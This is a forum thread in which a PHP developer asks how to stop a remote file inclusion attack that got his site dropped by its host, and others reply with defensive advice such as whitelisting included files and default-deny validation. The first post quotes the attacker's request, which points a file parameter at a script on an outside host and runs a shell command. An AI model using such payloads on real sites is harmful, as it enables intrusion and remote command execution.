Someone hacked a site I built

justbrock777

I have been told by my host that they will no longer host a site for me due to the 2nd attempt of someone used it as a launchpad for an attack.

I am pretty familiar with PHP and have built many sites, however this recent incident has caused me to be concerned about the potential risks to other sites.

My host says that the hacker/attacker used something like:
"/index_dot_php?file=http://cmd_dot_intersul_dot_org/cmd_dot_txt?&cmd=uname%20-a"
(the periods have been replaced with 'dot' incase this gets posted as a link)

Basically the hacker was able to piggy back on a "GET" request.

So, with that said, my question is to all you knowledgeable people in cyberland...

What can be done to NOT allow someone to do this?

Your help is GREATLY appreciated.

mtimdog

This link should get you on your way. Basically, you need to check to make sure you're not including anything in your files (several different ways)....I would prescribe using a switch and numbers like

<?php
index.php?nav=1

switch ($_GET['nav'])
{   case 1:  include ('page.php');
     break;
      default:
           include ('main.php');
}

?>

That way they don't have the option of including any files by their names (only file syou specify...but there are other methods).

mtimdog

btw, that link redirects to a page on http://simol.com.br/

I would send their host/isp an e-mail telling them what's going on (there's a link at the bottom of their site) and you can tell your isp (so they can decide what they want to do as far as contacting authorities or whatnot).

HTH🙂

swr

Your code is taking user input, and doing dangerous things with it. Don't do that. 🙂 Some functions, like fopen and system, can do all kinds of things. If you pass user-supplied data to those functions then the user can make those functions do nasty stuff.

You need to validate what the user is supplying, to make sure they can only do things that you know are okay. Don't try to block what you know is bad; you're sure to miss something. Instead, allow what you know is okay, and refuse to do anything else. This is called "default deny", and is generally the best security policy. And it's easy to remember because it is also a one hit wonder. 🙂

From the sound of things your code is swiss cheese, but it might also be worth mentioning to "someone" who runs your site that they can use PHP's safe mode to block the worst offences.

justbrock777

Thanks for your responses.

I have been rewriting my code for the entire site. This site was the first one I had written and now I realize I should have passed the file value differently.

Thanks again.

Bunkermaster

FreeBSD exploit, offsite includes should always be off or else...
we had a funny guy and his friends trying to hack our sites (we run around 300+ now) and he got f00k all for 2 month... then he did it and asked for money so we paid nada and closed all doors and sent him on his merry cyber crime unit way.

Voila

Bunkermaster

NOTE: he only managed to change ONE file and it was a minor script but could have been worse. We have a good team of geeks here 😃

dalecosp

You sure it's FreeBSD specific? Sure looks like any 'Nix might work...

And it is pretty scary ...